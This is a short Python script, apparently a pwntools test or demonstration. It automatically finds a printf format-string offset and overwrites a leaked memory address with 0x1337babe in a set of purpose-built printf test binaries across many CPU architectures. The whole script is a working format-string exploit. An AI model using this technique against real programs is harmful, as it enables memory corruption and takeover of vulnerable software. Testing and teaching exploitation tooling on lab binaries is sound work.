#!/usr/bin/env python
from pwn import *

@context.quiet
def exec_fmt(payload):
    p = context.binary.process()
    p.sendline(payload)
    return p.recvall()

def exploit(binary):
    context.binary = ELF(binary)
    autofmt = FmtStr(exec_fmt)
    offset = autofmt.offset
    with context.binary.process() as p:
        addr = unpack(p.recv(context.bytes))
        payload = fmtstr_payload(offset, {addr: p32(0x1337babe)})
        p.sendline(payload)
        p.recvuntil(b"DONE")
        print(hex(u32(p.recv(4))))

binaries = [
    "printf.mips",
    "printf.mips64",
    "printf.mipsel",
    "printf.mips64el",
    "printf.native",
    "printf.native32",
    "printf.ppc",
    "printf.ppc64",
    "printf.sparc64",
    "printf.arm",
    "printf.aarch64",
]

if len(sys.argv) > 1:
    binaries = sys.argv[1:]

for binary in binaries:
    exploit(binary)
